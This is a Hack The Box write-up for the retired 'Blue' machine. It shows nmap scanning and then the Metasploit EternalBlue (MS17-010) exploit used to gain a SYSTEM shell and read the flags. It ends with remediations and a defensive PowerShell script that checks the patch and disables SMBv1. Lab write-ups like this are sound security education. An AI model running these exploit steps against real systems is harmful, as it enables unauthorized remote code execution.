Keep Calm and Hack the Box - Blue

Hack The Box (HTB) is an online platform that allows you to test your penetration testing skills.

It contains several challenges that are constantly updated. Some of them simulate real world scenarios and some of them lean more towards a CTF style of challenge.

Note: Only write-ups of retired HTB machines are allowed.

Blue is one of the simplest machines on Hack The Box. But it demonstrates the impact of the EternalBlue exploit, which has been used to compromise companies through large-scale ransomware and crypto-mining attacks.

We will use the following tools to pwn the box from a Kali Linux box:

  • nmap
  • searchsploit
  • metasploit
  • meterpreter

Let's get started.

First, I add Blue to the /etc/hosts file.

nano /etc/hosts

with

10.10.10.40     blue.htb

Step 1 - Reconnaissance

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.

Port scanning

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing.

It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

I use the following command to perform an intensive scan:

nmap -A -v blue.htb

-A: Enables OS detection, version detection, script scanning, and traceroute

-v: Increases verbosity level

blue.htb: hostname for the Blue box

If you find the results a little bit too overwhelming, you can try this:

nmap blue.htb

We can see that there are quite a few open ports including:

Port 445, Microsoft-DS (Directory Services) SMB file sharing

From the nmap scan, we have some information concerning the computer name (haris-PC) and the SMB version (2.02).

The Server Message Block (SMB) is a network protocol that enables users to communicate with remote computers and servers in order to use their resources or share, open, and edit files.

From the name of this box, and the fact that it is a Windows machine with port 445 open, we can assume the machine is vulnerable to EternalBlue. I use an nmap script to verify this with the following command:

nmap --script vuln -p 445 blue.htb

We can see that the box is vulnerable to a Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010).

Step 2 - Understanding ms17-010

What is ms17-010?

EternalBlue is a cyberattack exploit developed by the U.S. National Security Agency (NSA). It was leaked by the Shadow Brokers hacker group on April 14, 2017, one month after Microsoft released patches for the vulnerability - Wikipedia

You can read more here. This vulnerability was patched and is listed on Microsoft’s Security Bulletin as MS17-010.

EternalBlue allows hackers to remotely execute arbitrary code to gain access to a network. It exploits a vulnerability in the Windows OS SMB protocol. The exploit can compromise the entire network and devices connected to it.

Malware that utilises EternalBlue can propagate across networks. In 2017, WannaCry – a crypto-ransomware – used the EternalBlue exploit which spread itself across the network infecting all connected devices.

Step 3 - Exploiting EternalBlue

I use Searchsploit to check if there is any known exploit. Searchsploit is a command line search tool for Exploit Database.

I use the following command:

searchsploit eternalblue

I can get more details on an exploit with:

searchsploit -x 41738.py

You can also check the Exploit Database to find the exploit.

There is one Metasploit module available.

We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders.

I launch the Metasploit Framework on Kali and look for the command I should use for the exploit.

Don't forget to update Metasploit when you launch it with this command:

msfupdate

You can also check whether the target is vulnerable to EternalBlue from Metasploit using an auxiliary module. Start with this command:

search eternalblue

then in that case

use 1

to select

auxiliary/scanner/smb/smb_ms17_010

You can check the options with

show options

and set RHOSTS with

set RHOSTS blue.htb

Then run the auxiliary with

run

You can see that the host is likely to be vulnerable to MS17-010!

Let's now check the exploit with

use 2

or the command

exploit/windows/smb/ms17_010_eternalblue

We need to set up the options for RHOSTS

and LHOST – mine was 10.10.14.24. You will need to set it up with your own LHOST. You can check yours here.

Before running the exploit, you can check here if the machine is vulnerable – this will run the auxiliary we used earlier with the command

check

I then run the exploit with

run

The exploit had to run several times before I got a Meterpreter session.

Here's the definition of Meterpreter from Offensive Security:

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

You can read more about Meterpreter here.

Let's start by gathering some information.

getuid returns the real user ID of the calling process.

NT AUTHORITY\SYSTEM, also known as the LocalSystem account, is a built-in Windows account. It is the most powerful account on a local Windows instance. We have admin access on that machine.

Step 4 - Looking for the user.txt flag

I navigate to the haris folder from Documents and Settings.

I can list all the files/folders with the following command:

ls -la

I then move to the Desktop with

cd Desktop

And I find the user flag! I can check the contents of the file with

cat user.txt

Step 5 - Looking for the root.txt flag

Let's find the root flag now. I navigate up to Users and check in to the Administrator/Desktop folder. I find the flag!

I use the following command to see the content of the file:

cat root.txt

Congrats! You found both flags.

Remediations

  • Patch your devices with the security update for Microsoft Windows SMB v1. You can check the Microsoft Security Bulletin to see which operating systems are affected
  • Disable SMB v1 and use SMB v2 or v3
  • Apply the principle of least privilege to all your systems and services
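As an added example (not code from the original article, Hack The Box, or Microsoft), here is a PowerShell audit for the first two remediations on a Windows host: it reports whether one of the March 2017 MS17-010 updates is installed and whether SMBv1 is still enabled, and with the -Remediate switch it turns SMBv1 off. It assumes Windows 8.1 / Server 2012 R2 or later and an elevated session; the KB list is a starting point only, since later cumulative updates supersede those KBs.

```powershell
# Added example, not part of the original article: audit a Windows host for the
# MS17-010 patch and for SMBv1 exposure, and optionally disable SMBv1.
# Assumes Windows 8.1 / Server 2012 R2 or later and an elevated PowerShell session.
[CmdletBinding()]
param([switch]$Remediate)

# March 2017 MS17-010 updates for Win7/2008R2, 8.1/2012R2, 2012, Vista/2008 and 10 (1607).
# Later cumulative updates supersede these, so "not found" means "verify", not "vulnerable".
$Ms17010Kbs = 'KB4012212','KB4012215','KB4012213','KB4012216',
              'KB4012214','KB4012217','KB4012598','KB4013429'

function Get-Smb1Status {
    $serverCfg = Get-SmbServerConfiguration   # server-side switch behind port 445
    $feature   = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
    # Sessions that negotiated a 1.x dialect show what would break once SMBv1 is turned off.
    $legacy    = @(Get-SmbSession -ErrorAction SilentlyContinue | Where-Object { $_.Dialect -like '1.*' })
    [pscustomobject]@{
        ServerSmb1Enabled  = $serverCfg.EnableSMB1Protocol
        Smb1FeatureState   = $(if ($feature) { $feature.State.ToString() } else { 'NotPresent' })
        ActiveSmb1Sessions = $legacy.Count
        LegacyClients      = (($legacy.ClientComputerName | Sort-Object -Unique) -join ',')
    }
}

function Test-Ms17010Patch {
    $installed = Get-HotFix | Where-Object { $Ms17010Kbs -contains $_.HotFixID }
    [pscustomobject]@{
        Ms17010KbFound = [bool]$installed
        MatchingKbs    = ($installed.HotFixID -join ',')
        OsBuild        = (Get-CimInstance Win32_OperatingSystem).BuildNumber
    }
}

$smb   = Get-Smb1Status
$patch = Test-Ms17010Patch
$smb   | Format-List
$patch | Format-List

if ($Remediate) {
    if ($smb.ActiveSmb1Sessions -gt 0) {
        Write-Warning "SMBv1 sessions still active from: $($smb.LegacyClients). Migrate those clients first."
    } else {
        # Stop serving SMB1 on port 445 and remove the legacy components (reboot completes the removal).
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
        Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null
        Write-Host 'SMBv1 disabled; reboot to finish removing the feature.'
    }
}
```

Run it without -Remediate first and review the LegacyClients list, since any client still negotiating a 1.x dialect loses access to the host's shares once SMBv1 is disabled.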

Please don’t hesitate to comment, ask questions or share with your friends :)

You can see more articles from the series Keep Calm and Hack the Box here.

You can follow me on Twitter or on LinkedIn.

And don't forget to #GetSecure, #BeSecure & #StaySecure!

Translated from: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-blue/
